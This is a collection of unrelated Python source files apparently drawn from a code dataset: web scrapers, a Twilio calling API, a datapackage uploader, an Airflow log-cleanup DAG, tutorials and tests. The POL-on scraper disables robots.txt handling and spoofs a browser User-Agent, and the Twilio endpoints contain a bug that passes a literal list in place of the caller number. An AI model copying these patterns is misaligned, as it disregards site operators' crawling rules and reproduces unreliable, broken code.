+{"seq_id":"312302632","text":"# !/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport sys\nimport time\n\nfrom bs4 import BeautifulSoup\nimport mechanize\nfrom selenium import webdriver\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom selenium.webdriver.support.select import Select\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\nfrom selenium.common.exceptions import NoSuchElementException\n\nfrom common.PathCreator import PathCreator\nfrom polon.POLonScraper import POLonScraper\n\nreload(sys)\nsys.setdefaultencoding(\"utf8\")\n\n\nclass POLonPhDScraper23072015(POLonScraper):\n def __init__(self, site='https://polon.nauka.gov.pl/opi/aa/drh/zestawienie?execution=e1s1'):\n POLonScraper.__init__(self, site)\n self.num_of_all_pages = self.__get_num_of_all_pages(self.site)\n\n def scrap(self):\n pages = []\n i = 1\n\n # prepare browser\n driver = webdriver.Firefox()\n 
driver.maximize_window()\n driver.get(self.site)\n wait = WebDriverWait(driver, 30)\n time.sleep(2)\n\n bad = True\n while bad:\n try:\n # paginate by 100\n select = Select(driver.find_element_by_id(\"filter:drhPageTable:j_idt162:j_idt165:j_idt171\"))\n select.select_by_visible_text(\"100\")\n bad = False\n except:\n pass\n\n while True:\n\n # wait until there is no loading spinner\n wait.until(EC.invisibility_of_element_located((By.ID, \"loadingPopup_content_scroller\")))\n time.sleep(1)\n\n # get next page number\n # current_page = driver.find_element_by_class_name(\"rf-ds-act\").text\n # print(\"Current page: %s\" % str(current_page))\n\n # collect results - pages\n page = driver.page_source\n pages.append(page)\n\n i += 1\n\n # proceed to the next page\n try:\n next_page = driver.find_element_by_link_text(u\"»\")\n next_page.click()\n except NoSuchElementException:\n break\n\n driver.close()\n\n return pages\n\n def save_to_files(self, pages, path):\n\n i = 1\n for page in pages:\n with open(path % i, \"w\") as text_file:\n text_file.write(page)\n i += 1\n\n def scrap_and_save_to_files(self, path):\n\n pages = []\n i = 1\n\n # prepare browser\n driver = webdriver.Firefox()\n driver.maximize_window()\n driver.get(self.site)\n wait = WebDriverWait(driver, 30)\n time.sleep(2)\n\n bad = True\n while bad:\n try:\n # paginate by 100\n select = Select(driver.find_element_by_id(\"filter:drhPageTable:j_idt162:j_idt165:j_idt171\"))\n select.select_by_visible_text(\"100\")\n bad = False\n except:\n pass\n\n while True:\n\n # wait until there is no loading spinner\n wait.until(EC.invisibility_of_element_located((By.ID, \"loadingPopup_content_scroller\")))\n time.sleep(1)\n\n # get next page number\n current_page = driver.find_element_by_class_name(\"rf-ds-act\").text\n print(\"Current page: %s\" % str(current_page))\n\n # collect results - pages\n page = driver.page_source\n pages.append(page)\n\n # save pages to files\n with open(path % i, \"w\") as text_file:\n text_file.write(page)\n\n i += 1\n\n # proceed to the next page\n try:\n next_page = driver.find_element_by_link_text(u\"»\")\n next_page.click()\n except NoSuchElementException:\n break\n\n driver.close()\n\n return pages\n\n def __get_num_of_all_pages(self, site):\n browser = mechanize.Browser()\n browser.set_handle_robots(False)\n browser.set_handle_equiv(False)\n browser.addheaders = [('User-Agent',\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'),\n ('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8'),\n ('Accept-Language', 'en-US,en;q=0.8,ru;q=0.6'),\n ('Cache-Control', 'max-age=0'),\n ('Connection', 'keep-alive')]\n\n html = browser.open(site)\n soup = BeautifulSoup(html, 'html.parser')\n result = soup.find_all('span', attrs={'style': 'margin-left: 20px;'})[0].text\n result = result.split()\n result = int(result[-2] + result[-1])\n result = round(result / 25) + 1\n browser.close()\n return int(result)\n\n\nif __name__ == \"__main__\":\n pc = PathCreator()\n path = pc.create_polon_phd_file_path('polon_phd_%s.txt')\n\n scraper = POLonPhDScraper23072015()\n # scraper.scrap_and_save_to_files(path)\n scraper.scrap()\n","sub_path":"POL-on/polon/POLonPhDScraper23072015.py","file_name":"POLonPhDScraper23072015.py","file_ext":"py","file_size_in_byte":5093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"147903706","text":"def scrape():\n from splinter import Browser\n from 
splinter.exceptions import ElementDoesNotExist\n import numpy as np\n from bs4 import BeautifulSoup\n import pandas as pd\n import requests\n executable_path = {'executable_path': 'Resources/chromedriver.exe'}\n browser = Browser('chrome', **executable_path, headless=False)\n\n # 1.1 Scraping News Title and Paragraphs\n url1 = 'https://mars.nasa.gov/news/?page=0&per_page=40&order=publish_date+desc%2Ccreated_at+desc&search=&category=19%2C165%2C184%2C204&blank_scope=Latest'\n browser.visit(url1)\n news_title = []\n news_para = []\n for pages in range(10):\n html = browser.html\n soup = BeautifulSoup(html, 'html.parser')\n titles = soup.find_all(class_ = 'content_title')\n paragraphs = soup.find_all(class_ = 'article_teaser_body')\n for title in titles: \n news_title.append(title.a.text)\n for paragraph in paragraphs:\n news_para.append(paragraph.text)\n try:\n browser.click_link_by_partial_text('MORE') \n except:\n print(\"Scraping Complete\")\n np_news_title = np.unique(np.array(news_title))\n np_news_para = np.unique(np.array(news_para))\n\n # 1.2 Get Images JPL Mars Space Images - Featured Image\n url2 = 'https://www.jpl.nasa.gov/spaceimages/?search=&category=Mars'\n browser.visit(url2)\n featured_image_url = []\n for pages in range(5):\n html = browser.html\n soup = BeautifulSoup(html, 'html.parser')\n url_imgs = soup.find_all(class_ = 'img')\n for url_img in url_imgs: \n image = url_img.img['src']\n featured_image_url.append('https://www.jpl.nasa.gov' + image)\n try:\n browser.click_link_by_partial_text('Next')\n except:\n print(\"Scraping Complete\")\n np_featured_image_url = np.unique(np.array(featured_image_url))\n\n # 1.3 Mars Weather\n url3 = 'https://twitter.com/marswxreport?lang=en'\n response = requests.get(url3)\n soup = BeautifulSoup(response.text, 'html.parser')\n mars_weather = []\n results = soup.find_all('div', class_=\"js-tweet-text-container\")\n for result in results:\n try:\n weather = result.p.text\n mars_weather.append(weather)\n except AttributeError as e:\n print(e)\n mars_weather = mars_weather[1]\n\n # 1.4 Mars Facts\n url4 = 'https://space-facts.com/mars/'\n marsFacts = pd.read_html(url4)[0]\n marsFacts.drop(columns = 'Earth', inplace = True)\n marsFacts.columns = ['MarsFacts', 'Value']\n marsFacts.head()\n\n # 1.5 Mars Hemispheres\n url5 = 'https://astrogeology.usgs.gov/search/results?q=hemisphere+enhanced&k1=target&v1=Mars'\n browser.visit(url5)\n image_url = []\n title = []\n href_container = []\n\n html = browser.html\n soup = BeautifulSoup(html, 'html.parser')\n href_url_divs = soup.find_all('div', class_ = 'item')\n for div in href_url_divs:\n href_container.append('https://astrogeology.usgs.gov' + div.a['href'])\n for links in href_container:\n try:\n browser.visit(links)\n html = browser.html\n soup = BeautifulSoup(html, 'html.parser')\n browser.click_link_by_partial_text('Open')\n img = soup.find('img', class_ = 'wide-image')\n title = soup.find('h2', class_ = 'title')\n print(img)\n image_url.append({'title': title.text.replace(' Enhanced',''),'img_url' : 'https://astrogeology.usgs.gov/' + img['src']})\n except:\n print('scraping complete')\n\n scrapped = {\n 'NewsTitle': np_news_title,\n 'NewsParagraps' : np_news_para,\n 'FeaturedImages' : np_featured_image_url,\n 'Facts': marsFacts,\n 'Weather': mars_weather,\n 'Hemispheres': image_url\n }\n return(scrapped)\n\nscrape_value = 
scrape()","sub_path":"scrape_mars.py","file_name":"scrape_mars.py","file_ext":"py","file_size_in_byte":3886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"129143089","text":"# SIMPLE HERITAGE\n# syntax:\n\nclass A:\n \"\"\"This is the super-class\"\"\"\n pass\n\nclass B(A):\n \"\"\"This class inherit from A\"\"\"\n pass\n\n# Example on inherited methods:\n\nclass Person:\n \"\"\"This class defines persons with attributes :\n - name\n - surname\n \"\"\"\n\n def __init__(self, surname):\n \"\"\"Constructor for the class Person\"\"\"\n self.surname = surname\n self.name = \"James\"\n\n def __str__(self):\n return \"{} {}\".format(self.name, self.surname)\n\nclass SpecialAgent(Person):\n \"\"\"This class inherit from Person but it has its own constructor and methods\"\"\"\n\n def __init__(self, surname, code):\n \"\"\"Constructor for the class Person\"\"\"\n self.surname = surname\n self.code = code\n\n def __str__(self):\n return \"Agent {}, code {}\".format(self.surname, self.code)\n\nagent = SpecialAgent(\"Fisher\", \"006\")\nprint(agent) # it works but if we do:\n# print(agent.name) we receive an AttributeError: 'SpecialAgent' object has no attribute 'name'\n\n# The reason is because we created the object as 'object = SpecialAgent(...)' and therefore we used the constructor in the subclass.\n# Python found a constructor in SpecialAgent hence it does not look above in Person.\n# It is useful to remind that 'my_object.my_method()' is equivalent to 'My_class.my_method(my_object)' and modify the constructor\n# of SpecialAgent in order to call the constructor of Person (which contains a default name):\n\nclass SpecialAgent(Person):\n \"\"\"This class inherit from Person but it has its own constructor and methods\"\"\"\n\n def __init__(self, surname, code):\n \"\"\"Constructor for the class Person\"\"\"\n #self.surname = surname # instead of declaring surname we call\n # the method '__init__' of the class 'Person' on the object 'self' (agent) taking the 'attributes' 'self' and 'surname':\n Person.__init__(self, surname)\n self.code = code\n\n def __str__(self):\n return \"Agent {}, code {}\".format(self.surname, self.code)\n\nagent = SpecialAgent(\"Bond\", \"007\")\nprint(agent)\nprint(agent.name) # and now it works !!\n\n# To solve the infinite loop calls of __setattr__ in special_methods.py we could have done a similar thing by calling explicitly inside\n# the method __setattr__ of our class, the method __setattr__ of the super-class object :\n\n# class SomeClass: # which, as any class, inherit from object by default\n#\n# def __setattr__(self, attr, value):\n# \"\"\"Method called when we type: objet.attr = value\"\"\"\n# print(\"Attention, we change the attribut {} of the object !\".format(attr))\n# object.__setattr__(self, attr, value)\n\n# To conclude the part on simple heritage we cite a couple of useful function which explain theirselves with examples:\n\nprint(\"SpecialAgent subclass of Person ? \", issubclass(SpecialAgent, Person))\nprint(\"Person subclass of SpecialAgent ? \", issubclass(Person, SpecialAgent))\nprint(\"SpecialAgent subclass of object ? \", issubclass(SpecialAgent, object))\nprint(\"Person subclass of object ? \",issubclass(Person, object))\n\nprint(\"agent istance of SpecialAgent ? \", isinstance(agent, SpecialAgent))\nprint(\"agent istance of Person ? 
\", isinstance(agent, Person))\n\n\n# MULTIPLE HERITAGE\n# syntax:\n\n#class SubClass(MotherClass1, MotherClass2):\n# pass\n\n# order is important: Python will look for methods first in Subclass, then in MotherClass1 and finally in MotherClass2\n\n\n# COME BACK TO EXCEPTIONS\n# Exceptions are not only classes but they also have a hierarchy according to a precise heritage scheme. To know more about it look at heritage.py\n# for example, take a look at:\nhelp(AttributeError)\n\n# We can insert our exception in the hierarchy. It must contain a constructor and a __str__ method:\n\nclass MyException(Exception): # it inherit from the super-class 'Exception'\n \"\"\"Exception raised in un undefined context\"\"\"\n\n def __init__(self, message):\n \"\"\"We just store the message\"\"\"\n self.message = message\n\n def __str__(self):\n \"\"\"We just return the message\"\"\"\n return self.message\n\nraise MyException(\"OOOPS... I did it again\")\n","sub_path":"heritage.py","file_name":"heritage.py","file_ext":"py","file_size_in_byte":4110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"193658489","text":"import os\nimport sys\n\nif os.name == 'nt':\n module_path = os.path.abspath(os.path.join('..\\..\\..'))\nelse:\n module_path = os.path.abspath(os.path.join('../../..'))\n\nif module_path not in sys.path:\n sys.path.append(module_path)\n\nfrom LNEX import LNExBase\n\n\ndef main(file_name):\n #find ditk_path from sys.path\n \n\n #instantiate the implemented class\n lnex_obj = LNExBase()\n\n # read data\n test_set,eval_set = lnex_obj.read_dataset(file_name)\n\n\n # initialiaze gazetteer\n dummy = \"\"\n geo_info = lnex_obj.train(dummy)\n\n\n # predict\n lnex_obj.predict(geo_info, test_set)\n\n # evaluation\n results = lnex_obj.evaluate(geo_info, eval_set)\n print(results)\n\n\nif __name__ == \"__main__\":\n #find ditk_path from sys.path\n ditk_path = \"\"\n for path in sys.path:\n if \"ditk\" in path:\n ditk_path = path\n #print(ditk_path)\n file_name = ditk_path+\"/entity_linkage/normalization/lnex/test/sample_input.txt\"\n main(file_name)","sub_path":"entity_linkage/normalization/lnex/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"110261887","text":"from suppliments import matrix as m\n\n# inp=[]\n# out=[]\n# t=[]\n# weights=[]\n# size_inp=int(input('No. of data sets'))\n# size_t=int(input('No. 
of elements in each data set'))\n# for i in range(0,size_inp):\n# t=[]\n# print('set '+str(i)+': ')\n# for j in range(0,size_t):\n# t.append(float(input('x'+str(j)+': ')))\n# t.append(1)\n# inp.append(t)\n# out.append(int(input('expected output:')))\n\n\n# training_data={'inp':inp,'out':out}\n\n# weights=m.assign_w(size_t,size_t)\n\n\n\n# # print(m.activation(m.dot(training_data['inp'][1],weights)[1]))\n\n\nclass nn():\n def __init__(self,layers):\n self.l=len(layers)\n self.weights=[]\n self.learning_rate=.5\n for i in range(self.l-1):\n w=m.assign_w(layers[i+1],layers[i])\n self.weights.append(w)\n\n def hi(self):\n print(self.l)\n print(self.weights)\n # print(self.weights[2][0][1])\n \n def forward(self,input):\n x=input\n self.a=[]\n for i in range(self.l-1):\n x.append(1)\n self.a.append(x)\n x=(m.activation(m.dot(self.weights[i],x),'sigmoid'))\n\n self.y_=x\n print(x)\n\n\n def bp(self,i,j,k):\n # print('i' +str(i)+' j '+str(j)+' k '+str(k)+':::: ' +str(self.a[i][k]))\n # print(self.weights[i][j][k])\n calc=self.weights[i][j][k]*self.a[i][k]*(1-self.a[i][k])\n print(' 1 calc '+str(self.weights[i][j][k])+'*'+str(self.a[i][k]*(1-self.a[i][k])))\n\n calc2=0\n if i>self.l-3:\n # print('i'+str(i))\n return calc\n for p in range(len(self.weights[i+1])):\n calc2=calc2+self.bp(i+1,p,j)\n print(' calc '+str(self.weights[i][j][k])+'*'+str(self.a[i][k]*(1-self.a[i][k]))+' calc2 '+str(calc2))\n return calc*calc2\n def backward(self,y):\n i=2\n j=0\n k=0\n correction=self.bp(i,j,k)\n # print(' ddddddd '+str(correction))\n correction=correction/(self.weights[i][j][k]*(1.0-self.a[i][k]))\n print(' ddddddd '+str(correction))\n correction=correction*self.learning_rate*2*(y-self.y_[0])\n self.weights[i][j][k]=self.weights[i][j][k]+correction\n\n\n def train(self,x,y):\n for i in range(100):\n for i in range(len(x)):\n self.forward(x[i])\n self.backward(y)\n\nx=[[1,1],[0,0],[1,0],[0,1]]\ny=[0,0,1,1]\n\nk=nn([2,2,2,1])\n# k.hi()\nfor i in range(20):\n print('######################################################################')\n # print(k.weights)\n k.forward([3,6])\n k.backward(1)\n\n\n\n# w=m.assign_w(3,2)\n# print(w)","sub_path":"sample data/backup.py","file_name":"backup.py","file_ext":"py","file_size_in_byte":2673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"25697613","text":"import serial\nfrom PySide2.QtCore import Signal, QRunnable, QObject\n\n\nclass Signals(QObject):\n over = Signal(object)\n started = Signal(object)\n con_fail = Signal(object)\n imp_fail = Signal(object)\n\n\nclass Worker(QRunnable):\n def __init__(self, fn, *args, **kwargs):\n super().__init__()\n self.fn = fn\n self.args = args\n self.kwargs = kwargs\n self.signals = Signals()\n\n def run(self):\n try:\n result = self.fn(*self.args, **self.kwargs)\n except serial.SerialException as ser_ex:\n print(ser_ex)\n self.signals.con_fail.emit(ser_ex)\n except NotImplementedError as imp_ex:\n print(imp_ex)\n self.signals.con_fail.emit(imp_ex)\n else:\n self.signals.over.emit(result)\n","sub_path":"Engine/ThreadDecorators.py","file_name":"ThreadDecorators.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"328615221","text":"from flask import Blueprint\nfrom flask import request\nfrom flask import jsonify\n\nfrom credentials import credentials\nfrom twilio.rest import Client\n\nvoice = Blueprint(\"voice\", __name__)\n\n@voice.route(\"/outbound\", methods=['POST'])\ndef 
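# A usage sketch for the Worker/Signals pair above (assumes a Qt application
# with a running event loop; `job` is a stand-in for any callable):
from PySide2.QtCore import QThreadPool

def job(x, y):
    return x + y

worker = Worker(job, 2, 3)
worker.signals.over.connect(print)         # receives the result (5) on success
QThreadPool.globalInstance().start(worker)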
outbound():\n try:\n data = request.json\n\n account_sid = credentials['account_sid']\n auth_token = credentials['auth_token']\n client = Client(account_sid, auth_token)\n \n call = client.calls.create(\n url=data['twiml_url'],\n to=data['to'],\n from_=['from']\n )\n \n return 'sucess'\n\n except Exception as e:\n return (str(e))\n\n@voice.route(\"/record\", methods=['post'])\ndef record():\n try:\n data = request.json\n\n account_sid = credentials['account_sid']\n auth_token = credentials['auth_token']\n client = Client(account_sid, auth_token)\n\n call = client.calls.create(\n record=True,\n url=data['twiml_url'],\n to=data['to'],\n from_=['from']\n )\n\n return 'sucess'\n \n except Exception as e:\n return (str(e))\n\n@voice.route(\"/retrieve-recording\", methods=['get'])\ndef retrieve():\n try:\n account_sid = credentials['account_sid']\n auth_token = credentials['auth_token']\n client = Client(account_sid, auth_token)\n\n response = {}\n\n recordings = client.recordings.list(limit=20)\n\n for index, record in enumerate(recordings):\n temp = { 'recording_sid': record.sid, 'account_sid': record.account_sid, 'call_sid': record.call_sid, 'duration': record.duration }\n response[index] = temp\n\n return response\n \n except Exception as e:\n return (str(e))","sub_path":"voice/voice.py","file_name":"voice.py","file_ext":"py","file_size_in_byte":1755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"622081809","text":"\"\"\" This modules uploads data-packages to the Open-Spending datastore\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport sys\nimport io\n\nfrom base64 import b64encode\nfrom hashlib import md5\nfrom os.path import getsize, join, basename, isfile\nfrom time import sleep\nfrom datapackage import DataPackage\nfrom datapackage.exceptions import ValidationError\nfrom future import standard_library\nfrom gobble.user import User\nfrom requests import HTTPError\nfrom requests_futures.sessions import FuturesSession\n\nfrom gobble.config import settings\nfrom gobble.logger import log\nfrom gobble.api import (handle, upload_package, request_upload,\n toggle_publish, upload_status)\n\nstandard_library.install_aliases()\n\n\nHASHING_BLOCK_SIZE = 65536\nOS_DATA_FORMATS = ['.csv']\nPOLL_PERIOD = 5\n\n\nclass ToggleError(Exception):\n pass\n\n\ndef compute_hash(filepath):\n \"\"\"Return the md5 hash of a file\"\"\"\n hasher = md5()\n\n with io.open(filepath, 'rb') as stream:\n chunk = stream.read(HASHING_BLOCK_SIZE)\n while len(chunk) > 0:\n hasher.update(chunk)\n chunk = stream.read(HASHING_BLOCK_SIZE)\n\n md5_binary = hasher.digest()\n md5_bytes = b64encode(md5_binary)\n md5_unicode = md5_bytes.decode('utf-8')\n\n return md5_unicode\n\n\nclass FiscalDataPackage(DataPackage):\n \"\"\"This class represents a fiscal data package.\n\n The class is a subclass of the :class:`datapackage.DataPackage` class.\n The constructor takes the same arguments as its parent class, except that\n the schema is \"fiscal\".\n\n :param target: The target is the full path to the fiscal datapackage JSON\n descriptor, but it can also be a dictionary representing the schema itself\n or a url pointing to a descriptor (for more information please refer to the\n documentation for the :class:`datapackage.DataPackage` class.\n :param user: a `gobble.user.user` object.\n \"\"\"\n\n def __init__(self, filepath, user=None, **kw):\n if not 
isfile(filepath):\n raise NotImplemented('%s is not a local path', filepath)\n\n super(FiscalDataPackage, self).__init__(filepath,\n schema='fiscal', **kw)\n self._check_file_formats()\n\n self._streams = []\n self._session = FuturesSession()\n self._futures = []\n self._responses = []\n\n self.user = user\n self.name = self.descriptor.get('name')\n self.path = basename(filepath)\n self.filepath = filepath\n\n def validate(self, raise_error=True):\n \"\"\"Validate a datapackage schema.\n\n :param raise_error: raise error on failure or not (default: True)\n :raise: :class:`ValidationError` if the schema is invalid\n :return True or a list of error messages (if `raise_error` is False).\n \"\"\"\n if raise_error:\n super(FiscalDataPackage, self).validate()\n\n else:\n try:\n super(FiscalDataPackage, self).validate()\n message = '%s (%s) is a valid fiscal datapackage descriptor'\n log.info(message, self, self.path)\n return []\n\n except ValidationError:\n messages = []\n\n for error in self.iter_errors():\n messages.append(error.message)\n log.warn('%s ValidationError: %s', self, error.message)\n\n return messages\n\n def upload(self, publish=False):\n \"\"\"Upload a fiscal datapackage to Open-Spending.\n\n It does this in 3 steps:\n * request upload urls for AWS S3 storage\n * upload all files to the owner's S3 bucket\n * insert the data into the Open-Spending datastore (PostgreSQL)\n\n By default, newly uploaded packages are kept private, but you can\n change that with the `publish` flag. Also note that if you upload the\n same fiscal data package again, the previous version will be\n overwritten.\n\n For now, the only valid datafile format is CSV.\n\n :param publish: toggle the datapackage to \"published\" after upload\n \"\"\"\n self.validate()\n log.info('Starting uploading process for %s', self)\n\n for s3_target in self._request_s3_upload():\n self._push_to_s3(*s3_target)\n\n self._handle_promises()\n self._insert_into_datastore()\n\n while self.in_progress:\n sleep(POLL_PERIOD)\n\n if publish:\n self.toggle('public')\n\n return self.url\n\n @property\n def url(self):\n return join(settings.OS_URL, self.user.id + ':' + self.name)\n\n @property\n def in_progress(self):\n \"\"\"Return true when the upload finished.\"\"\"\n\n query = dict(datapackage=self._descriptor_s3_url)\n answer = upload_status(params=query).json()\n args = self, answer['status'], answer['progress'], len(self)\n log.debug('%s is loading (%s) %s/%s', *args)\n return answer['status'] != 'done'\n\n def toggle(self, to_state):\n \"\"\"Toggle public access to a fiscal datapackage\n\n Change the status of a fiscal data package from public to private or\n vice-versa. If something went wrong, whilst changing the status, you\n will get a :class:`upload.ToggleError`.\n\n :param to_state: the unique name of the datapackage\n :return: the new state of the package, i.e. 
\"public\" or \"private\"\n \"\"\"\n publish = True if to_state == 'public' else False\n package_id = self.user.id + ':' + self.name\n query = dict(jwt=self.user.token, id=package_id, publish=publish)\n\n answer = handle(toggle_publish(params=query))\n\n if not answer['success']:\n message = 'Unable to toggle datapackage to %s'\n raise ToggleError(message, to_state)\n\n log.info('%s is now %s', package_id, to_state)\n return to_state\n\n def _check_file_formats(self):\n for resource in self:\n if resource.descriptor['mediatype'] != 'text/csv':\n message = 'Usupported format: %s, valid formats are %s'\n raise NotImplemented(message, resource.path, OS_DATA_FORMATS)\n\n @property\n def filedata(self):\n filedata = {\n resource.descriptor['path']: {\n 'name': resource.descriptor['name'],\n 'length': getsize(resource.local_data_path),\n 'md5': compute_hash(resource.local_data_path),\n 'type': resource.descriptor['mediatype'],\n } for resource in self\n }\n descriptor_file = {\n basename(self.filepath): {\n 'name': self.name,\n 'length': getsize(self.filepath),\n 'md5': compute_hash(self.filepath),\n 'type': 'application/octet-stream',\n }\n }\n filedata.update(descriptor_file)\n return {\n 'filedata': filedata,\n 'metadata': {\n 'owner': self.user.id,\n 'name': self.name\n }\n }\n\n def _get_header(self, path, content_type):\n filepath = join(self.base_path, path)\n return {'Content-Length': str(getsize(filepath)),\n 'Content-MD5': compute_hash(filepath),\n 'Content-Type': content_type}\n\n @property\n def _descriptor_s3_url(self):\n return join(settings.S3_BUCKET_URL, self.user.id, self.name, self.path)\n\n def _request_s3_upload(self):\n \"\"\"Request AWS S3 upload urls for all files.\n \"\"\"\n response = request_upload(params=dict(jwt=self.user.token), json=self.filedata)\n files = handle(response)['filedata']\n\n for path, info in files.items():\n message = '%s is ready for upload to %s'\n log.info(message, path, info['upload_url'])\n query = {k: v[0] for k, v in info['upload_query'].items()}\n yield info['upload_url'], path, query, self._get_header(path, info['type'])\n\n def _push_to_s3(self, url, path, query, headers):\n \"\"\"Send data files for upload to the S3 bucket.\n \"\"\"\n\n log.debug('Started uploading %s to %s', path, url)\n log.debug('Headers: %s', headers)\n log.debug('Query parameters: %s', query)\n\n absolute_path = join(self.base_path, path)\n stream = io.open(absolute_path, mode='rb')\n future = self._session.put(url,\n headers=headers,\n data=stream,\n params=query,\n background_callback=self._s3_callback)\n\n self._streams.append(stream)\n self._futures.append(future)\n\n @staticmethod\n def _s3_callback(_, response):\n handle(response)\n log.info('Successful S3 upload: %s', response.url)\n\n def _handle_promises(self):\n \"\"\"Collect all promises from S3 uploads.\n \"\"\"\n for stream, future in zip(self._streams, self._futures):\n exception = future.exception()\n if exception:\n raise exception\n response = future.result()\n\n if response.status_code != 200:\n message = 'Something went wrong uploading %s to S3: %s'\n log.error(message, response.url, response.text)\n raise HTTPError(message)\n\n self._responses.append(response)\n stream.close()\n\n def _insert_into_datastore(self):\n \"\"\"Transfer datafiles from S3 into the postgres datastore.\n\n :return: the url of the fiscal datapackage on Open-Spending\n \"\"\"\n query = dict(jwt=self.user.token, datapackage=self._descriptor_s3_url)\n response = upload_package(params=query)\n handle(response)\n\n 
log.info('Congratulations, %s was uploaded successfully!', self)\n log.info('You can find your fiscal datapackage here: %s', self.url)\n\n return self.url\n\n def __len__(self):\n return len(self.resources)\n\n def __repr__(self):\n return '<FiscalDataPackage (%s resources): %s>' % (len(self), self.name)\n\n def __str__(self):\n return self.name\n\n def __iter__(self):\n for resource in self.resources:\n yield resource\n\n def __getitem__(self, index):\n return self.resources[index]\n\n\nif __name__ == '__main__':\n user_ = User()\n filepath_ = sys.argv[1]\n package_ = FiscalDataPackage(filepath_, user=user_)\n package_.upload(publish=True)\n","sub_path":"gobble/fiscal.py","file_name":"fiscal.py","file_ext":"py","file_size_in_byte":10567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"599060002","text":"from openerp import models,fields\n\n\nclass InvoiceLine(models.Model):\n _inherit = 'account.invoice.line'\n\n date = fields.Datetime(string='Date')\n\n def create(self, cr, uid, values, context=None):\n values['date'] = fields.Datetime.now()\n return super(InvoiceLine, self).create(cr, uid, values, context=context)\n\n\n","sub_path":"prooaddons/medisys/invoice/invoice.py","file_name":"invoice.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"436003035","text":"#Wiaux Bastien\nfrom math import sqrt as racine_carree\n\ndef rho(a,b,c):\n return b**2-4*a*c\n\ndef n_solutions(a,b,c):\n r = rho(a, b, c)\n if r > 0:\n return 2\n elif r < 0:\n return 0\n elif r == 0: \n return 1\n \ndef solution(a,b,c):\n if n_solutions(a,b,c) == 1:\n return -b/(2*a)\n if n_solutions(a,b,c) == 2:\n x1 = (-b-racine_carree(rho(a,b,c)))/(2*a)\n x2 = (-b+racine_carree(rho(a,b,c)))/(2*a)\n if x1 > x2:\n return x2\n else:\n return x1\n","sub_path":"Exercices/3/Q Equations du second degré.py","file_name":"Q Equations du second degré.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"557949859","text":"# -*- coding: utf-8 -*-\n\"\"\"\n# DAG to remove dag_processor_log files older than 10 days.\n\"\"\"\nfrom airflow import DAG\nfrom datetime import datetime, timedelta\nfrom airflow.operators.python_operator import PythonOperator\nfrom dags.exec_in_pod import exec_in_pod\n\nimport os\n\nSTART_DATE = datetime.now() - timedelta(weeks=2)\n\nnamespace = os.getenv('NAMESPACE')\ndeployment_name = 'airflow'\nselector = 'component=web'\nin_cluster = os.getenv('LOCAL_AIRFLOW', False) == 'False'\n\ndefault_args = {\n 'owner': 'airflow',\n 'depends_on_past': False,\n 'start_date': START_DATE,\n 'email_on_failure': False,\n 'email_on_retry': False,\n 'retries': 1,\n 'retry_delay': timedelta(minutes=5),\n}\n\nexec_command = [\n '/bin/sh',\n '-c',\n 'find /usr/local/airflow/logs/dag_processor_manager -name \"dag_processor_manager.log.*\" -type f -mtime +10 -exec rm -f {} \\;'\n]\n\nDAG_ID = os.path.basename(__file__).replace(\".pyc\", \"\").replace(\".py\", \"\")\n\nremove_logs_dag = DAG(DAG_ID, default_args=default_args, schedule_interval='@weekly')\n\ndef remove_logs(dag):\n return PythonOperator(\n python_callable=exec_in_pod,\n task_id='remove_processor_logs',\n op_args=[deployment_name, namespace, exec_command, selector],\n dag=dag\n 
)\n\nremove_logs(remove_logs_dag)\n","sub_path":"dags/remove_old_processor_logs.py","file_name":"remove_old_processor_logs.py","file_ext":"py","file_size_in_byte":1268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"391279738","text":"\nimport pytest\nimport numpy as np\nimport warnings\nfrom numpy.testing import assert_array_almost_equal\n\nimport GPy\nfrom gp_grief.kern import RBF\nfrom gp_grief.models import GPRegressionModel\n\n\ndef rastrigin(x, lin_term=None):\n \"\"\"\n Rastrigin test function\n input should be in range [-5.12, 5.12]\n if x in range [0,1], can transform by rastrigin((x*2-1)*5.12)\n if lin_term is not None then will add a linear term to the first dimension. \n This helps to make the function non-symetric wrt the input dimensions\n \"\"\"\n assert x.ndim == 2\n d = x.shape[1]\n f = 10*d\n for i in range(d):\n f = f+(np.power(x[:,i,None],2) - 10*np.cos(2*np.pi*x[:,i,None]));\n if lin_term is not None:\n f += lin_term*x[:,(0,)]\n return f\n\n\nclass TestRegression:\n\n def test_gp_grief_model_all_active (self):\n for d in [1, 10]:\n # generate data\n np.random.seed(0)\n N = 100\n x = np.random.uniform(size=(N,d)) # generate dataset\n y = rastrigin((x*2-1)*5.12, lin_term=1.)\n xx = np.random.uniform(size=(N+1,d)) # generate test set\n\n # initialize GPy.models.GPRegression\n kern = GPy.kern.RBF(d)\n #with pytest.warns(UserWarning):\n mg = GPy.models.GPRegression(x, y, kern)\n #print('hej2')\n #warnings.warn(\"my warning\", UserWarning)\n # initialize gp_grief model\n kern = 